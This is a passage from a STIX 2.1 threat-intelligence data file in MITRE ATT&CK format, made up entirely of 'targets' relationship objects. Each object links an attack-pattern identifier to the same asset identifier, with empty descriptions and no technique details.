"", "relationship_type": "targets", "source_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1342af68-f391-4879-ae8c-7d1bab638e62", "created": "2024-07-01T10:37:15.817814", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817816", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--356662f7-e315-4759-86c9-6214e2a50ff8", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d2ef57cc-5490-480c-8513-aa9a8bd501c5", "created": "2024-07-01T10:37:15.817824", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817826", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c813a9df-ce9e-41e5-92f5-a207fcfb7f54", "created": "2024-07-01T10:37:15.817835", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817837", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eb97715f-ed9e-4890-8cf6-3b6ade82ae08", "created": "2024-07-01T10:37:15.817845", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817847", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5a291127-6c12-4354-b694-10971d05b8f4", "created": "2024-07-01T10:37:15.817855", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817857", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3799f687-5e5a-4d12-9a38-b16409618c13", "created": "2024-07-01T10:37:15.817865", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817868", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ee9c53db-b2ff-46c9-a1dc-6468ea6a0df3", "created": "2024-07-01T10:37:15.817876", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817878", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a9d0ff77-b254-42dc-aca5-3f86b2e6888c", "created": "2024-07-01T10:37:15.817886", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817888", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--91fe90a5-d916-4a97-9458-a76a36e8bf43", "created": "2024-07-01T10:37:15.817896", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817898", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--79d14b15-b017-4959-87eb-e9a01c30a711", "created": "2024-07-01T10:37:15.817907", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817909", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--903bb351-cbf3-49ec-9de4-9d30c75864e5", "created": "2024-07-01T10:37:15.817917", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817919", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--679a34a8-dd1b-473b-b04e-58d2b5322699", "created": "2024-07-01T10:37:15.817927", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817929", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7f16af7c-6586-40b5-986c-c1086039b104", "created": "2024-07-01T10:37:15.817937", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817939", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3647eeb0-298b-41b1-b867-082546cd5586", "created": "2024-07-01T10:37:15.817947", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817950", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3a32740a-11b0-4bcf-b0a9-3abd0f6d3cd5", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e6ffe074-be03-42da-a2ae-fad996ff93a1", "created": "2024-07-01T10:37:15.817958", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817960", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--109342b8-7d24-4fc0-82dc-ef6ac10b6347", "created": "2024-07-01T10:37:15.817968", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817970", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3ba30b6c-873e-4b1e-b1a7-223e6924ca09", "created": "2024-07-01T10:37:15.817978", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817980", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--891bd972-1616-475b-8701-aad892f4a505", "created": "2024-07-01T10:37:15.817988", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817990", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7997ab9d-907f-4efa-be2d-4be8f39039fb", "created": "2024-07-01T10:37:15.817999", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818001", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--44bbe1b4-db36-4e81-8e2d-d4568f0bda14", "created": "2024-07-01T10:37:15.818009", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818011", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a56fa723-52c0-4847-9d97-feb49f4dd34f", "created": "2024-07-01T10:37:15.818019", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818021", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2c1e9665-e6f5-40cb-bb23-380a9e6adb42", "created": "2024-07-01T10:37:15.818030", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818032", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5a6ba7e8-8a70-459d-b911-aca9137fae70", "created": "2024-07-01T10:37:15.818040", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818042", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b8054ae2-e64d-4e27-820c-519ba483829c", "created": "2024-07-01T10:37:15.818050", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818052", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ce9577fb-5716-476b-bd0a-e96e33e34aa7", "created": "2024-07-01T10:37:15.818060", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818062", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8ba8e55d-d004-4903-be3c-d3e9e346955a", "created": "2024-07-01T10:37:15.818071", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818073", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9dbaaeb1-100e-4605-b34e-ee830a06faec", "created": "2024-07-01T10:37:15.818081", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818083", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1a1d6edb-76d9-4da4-b856-39e2bbd6e951", "created": "2024-07-01T10:37:15.818092", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818094", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ae867607-578f-4974-bc23-498a6fd6eec1", "created": "2024-07-01T10:37:15.818102", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818104", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--13f657e9-a7ad-4f93-9a3b-21685ceeb2cf", "created": "2024-07-01T10:37:15.818112", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818114", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c161f561-6d52-41c8-a4cc-d0a0eb36b0a7", "created": "2024-07-01T10:37:15.818123", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818125", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1463317a-66bb-45f4-b9f8-2a22efedea7d", "created": "2024-07-01T10:37:15.818133", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818135", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--85ba954f-ab5e-4b80-9f56-135c2fbb3176", "created": "2024-07-01T10:37:15.818144", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818146", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aa3d8942-50b8-430b-890e-39468a6611f6", "created": "2024-07-01T10:37:15.818154", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818156", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--79dac00a-dfe4-4f8a-b2eb-5e8efe724af6", "created": "2024-07-01T10:37:15.818164", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818166", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43c9bc06-715b-42db-972f-52d25c09a20c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b4b232e5-a18b-4974-8315-cf9e86b333da", "created": "2024-07-01T10:37:15.818174", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818176", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--111396ac-3341-4e9e-95cb-7bddb17dd9bc", "created": "2024-07-01T10:37:15.818184", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818186", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8e41e9cb-0727-4ce1-937b-7bdecf4419d7", "created": "2024-07-01T10:37:15.818195", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818197", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c5975ad0-1c41-426d-802f-af9fc8d80ac1", "created": "2024-07-01T10:37:15.818205", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818207", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d2340a3b-2fa1-46eb-8e2c-481543715634", "created": "2024-07-01T10:37:15.818215", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818217", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f875157f-3329-4839-b6b0-40640f309118", "created": "2024-07-01T10:37:15.818225", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818227", "description": "", "relationship_type": "targets", "source_ref": 